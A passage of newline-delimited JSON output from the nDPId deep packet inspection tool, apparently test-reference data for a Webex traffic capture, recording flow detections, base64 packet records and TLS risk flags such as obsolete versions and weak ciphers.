{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628117,"flow_last_seen":1444570628565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570628565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570630272,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAA0ymtAAEAGS1oKhc4vuT+TCtV7Abs2TX647AAfvYARAZp5QwAAAQEICgBMwJ1XHSbf"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAAoAWBAABAGRHK5P5MKCoXOLwG71XvsAB+9Nk1+uVAQ\/\/\/y2gAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1444570630272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAAoAWFAABAGRHG5P5MKCoXOLwG71XvsAB+9Nk1+uVAR\/\/\/y2QAA"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570631058,"flow_last_seen":1444570631058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570631058,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1444570631058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570631058,"pkt":"ABoRAAACABoRAAABCABFAAA0G+BAAEAG6O4Khc4vaxTyLOg3Abv3v7ExKrw8QIARAiEILgAAAQEICgBMwOxXHSRB"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1444570631058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631058,"pkt":"ABoRAAACABoRAAABCABFAAAoAWRAABAGM3drFPIsCoXOLwG76DcqvDxA97+xMlAQ\/\/9\/\/QAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1444570631059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631059,"pkt":"ABoRAAACABoRAAABCABFAAAoAWVAABAGM3ZrFPIsCoXOLwG76DcqvDxA97+xMlAR\/\/9\/\/AAA"} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570631722,"flow_last_seen":1444570631722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570631722,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1444570631722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570631722,"pkt":"ABoRAAACABoRAAABCABFAAA87rhAAEAGmE8KCAABQERpZ6GKAbt6Ji+WAAAAAKACOQhMyAAAAgQFtAQCCAoATMEuAAAAAAEDAwY="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1444570631726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAoAWZAABAGtbZARGlnCggAAQG7oYqF2dBpeiYvl1AS\/\/9Y2AAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1444570631726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAo7rlAAEAGmGIKCAABQERpZ6GKAbt6Ji+XhdnQalAQOQgf0QAA"} 
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570631722,"flow_last_seen":1444570631731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570631731,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570631722,"flow_last_seen":1444570632251,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570632251,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570632436,"flow_last_seen":1444570632436,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570632436,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1444570632436,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570632436,"pkt":"ABoRAAACABoRAAABCABFAAA8E6FAAEAGB\/MKCAABFyz987+YAbs3etLXAAAAAKACOQhiaAAAAgQFtAQCCAoATMF2AAAAAAEDAwY="} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1444570632439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632439,"pkt":"ABoRAAACABoRAAABCABFAAAoAWtAABAGSj0XLP3zCggAAQG7v5jIhS0oN3rS2FAS\/\/\/PVQAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1444570632470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632470,"pkt":"ABoRAAACABoRAAABCABFAAAoE6JAAEAGCAYKCAABFyz987+YAbs3etLYyIUtKVAQOQiWTgAA"} +00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570632436,"flow_last_seen":1444570632470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570632470,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01861{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570632436,"flow_last_seen":1444570632591,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2903,"flow_tot_l4_payload_len":2966,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1444570632591,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"www.webex.com.au,www.webex.ca,www.webex.de,www.webex.com.hk,www.webex.co.in,www.webex.co.it,www.webex.co.jp,www.webex.com.mx,www.webex.co.uk,m.webex.com,signup.webex.com,signup.webex.co.uk,signup.webex.de,mytrial.webex.com,mytrial.webex.com.mx,mytrial.webex.co.in,mytrial.webex.com.au,mytrial.webex.co.jp,support.webex.com,howdoi.webex.com,kb.webex.com,myresources.webex.com,invoices.webex.com,try.webex.com,buyonline.webex.com,buyonline.webex.de,buyonline.webex.co.uk,tempbol.webex.com,tempsupport.webex.com,www.webex.com,webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=GeoTrust, Inc., CN=GeoTrust SSL CA","subjectDN":"C=US, ST=California, L=San Jose, O=Cisco Systems, OU=IT, CN=www.webex.com","fingerprint":"EE:CE:24:B7:67:4D:F0:3F:16:80:F8:DC:E3:53:45:5F:3E:41:25:CD"}} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570633357,"flow_last_seen":1444570633357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570633357,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1444570633357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570633357,"pkt":"ABoRAAACABoRAAABCABFAAA87DBAAEAGmtcKCAABQERpZ6GOAbtaKC3iAAAAAKACOQht0gAAAgQFtAQCCAoATMHSAAAAAAEDAwY="} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1444570633360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAoAXpAABAGtaJARGlnCggAAQG7oY6l19IdWigt41AS\/\/9Y1AAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1444570633360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570633360,"pkt":"ABoRAAACABoRAAABCABFAAAo7DFAAEAGmuoKCAABQERpZ6GOAbtaKC3jpdfSHlAQOQgfzQAA"} 
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570633357,"flow_last_seen":1444570633362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570633362,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570633357,"flow_last_seen":1444570633811,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570633811,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636151,"flow_last_seen":1444570636151,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636151,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1444570636151,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636151,"pkt":"ABoRAAACABoRAAABCABFAAA8tbVAAEAGMwwKCAABch3V1KL+AbsYGndcAAAAAKACOQjFmAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1444570636154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636154,"pkt":"ABoRAAACABoRAAABCABFAAAoAY1AABAGF0lyHdXUCggAAQG7ov7n5YijGBp3XVAS\/\/+5HQAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1444570636154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636154,"pkt":"ABoRAAACABoRAAABCABFAAAotbZAAEAGMx8KCAABch3V1KL+AbsYGndd5+WIpFAQOQiAFgAA"} +00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636155,"flow_last_seen":1444570636155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636155,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1444570636155,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636155,"pkt":"ABoRAAACABoRAAABCABFAAA8NxlAAEAGu0sKCAABch3MMcm+AbvkVPXwAAAAAKACOQhdrAAAAgQFtAQCCAoATMLpAAAAAAEDAwY="} 
+00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1444570636157,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636157,"pkt":"ABoRAAACABoRAAABCABFAAAoAY5AABAGIOtyHcwxCggAAQG7yb4bqwoP5FT18VAS\/\/+cAAAA"} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636151,"flow_last_seen":1444570636157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636157,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1444570636158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570636158,"pkt":"ABoRAAACABoRAAABCABFAAAoNxpAAEAGu14KCAABch3MMcm+AbvkVPXxG6sKEFAQOQhi+QAA"} 
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570636155,"flow_last_seen":1444570636159,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570636159,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570636160,"flow_last_seen":1444570636160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570636160,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1444570636160,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570636160,"pkt":"ABoRAAACABoRAAABCABFAAA80GxAAEAGr+EKCAAB0cXen7mKAbt7nBKGAAAAAKACOQhH7AAAAgQFtAQCCAoATMLqAAAAAAEDAwY="} 